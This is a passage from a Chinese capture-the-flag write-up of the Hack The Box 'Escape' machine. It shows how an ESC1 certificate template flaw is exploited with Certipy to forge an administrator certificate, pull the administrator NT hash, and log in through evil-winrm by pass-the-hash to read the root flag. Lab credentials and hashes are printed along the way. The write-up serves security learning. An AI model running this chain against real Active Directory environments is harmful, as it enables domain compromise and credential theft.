    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 10 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2022-11-18T21:10:22+00:00
    Template Last Modified              : 2024-01-19T00:26:38+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Domain Users
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Administrator
        Full Control Principals         : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Write Property Enroll           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Domain Users
                                          SEQUEL.HTB\Enterprise Admins
    [+] User Enrollable Principals      : SEQUEL.HTB\Domain Users
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication.

显示有可利用的模板 ESC

3.2 获取 admin 证书

┌──(certipy-ad_env)─(kali㉿kali)-[~/htb/escape]
└─$ certipy-ad req -u Ryan.Cooper@sequel.htb -p 'NuclearMosquito3' -dc-ip 10.129.12.4 -template UserAuthentication -ca sequel-DC-CA -upn administrator@sequel.htb
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 14
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx

再通过证书去获取 hash
别忘了同步时间

┌──(certipy-ad_env)─(kali㉿kali)-[~/htb/escape]
└─$ sudo ntpdate -u 10.129.12.4       
[sudo] password for kali: 
2026-07-06 09:38:59.034622 (-0400) +28800.271546 +/- 0.050040 10.129.12.4 s1 no-leap
CLOCK: time stepped by 28800.271546

┌──(certipy-ad_env)─(kali㉿kali)-[~/htb/escape]
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.12.4
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@sequel.htb'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

再用 hashdump 整个域的 hash

3.3 登入获取 flag

┌──(certipy-ad_env)─(kali㉿kali)-[~/htb/escape]
└─$ evil-winrm -i sequel.htb -u administrator -H 'a52f78e4c751e5f5e17e1e9f3e58f4ee'
                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../
*Evil-WinRM* PS C:\Users\Administrator> ls


    Directory: C:\Users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/6/2023  11:51 AM                .azuredatastudio
d-r---         2/1/2023   8:57 PM                3D Objects
d-r---         2/1/2023   8:57 PM                Contacts
d-r---         2/6/2023   3:43 PM                Desktop
d-r---         2/1/2023   8:57 PM                Documents
d-r---         2/6/2023  11:50 AM                Downloads
d-r---         2/1/2023   8:57 PM                Favorites
d-r---         2/1/2023   8:57 PM                Links
d-r---         2/1/2023   8:57 PM                Music
d-r---         2/1/2023   8:57 PM                Pictures
d-r---         2/1/2023   8:57 PM                Saved Games
d-r---         2/1/2023   8:57 PM                Searches
d-r---         2/1/2023   8:57 PM                Videos


*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> ls


    Directory: C:\Users\Administrator\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         7/5/2026   8:09 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
cbe225752dfbf403822d142f1e67219b
*Evil-WinRM* PS C:\Users\Administrator\desktop>
文末附加内容

评论

  1. 博主
    Windows Edge
    2 周前
    2026-7-06 23:28:59

    操作视频已在b站发布

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇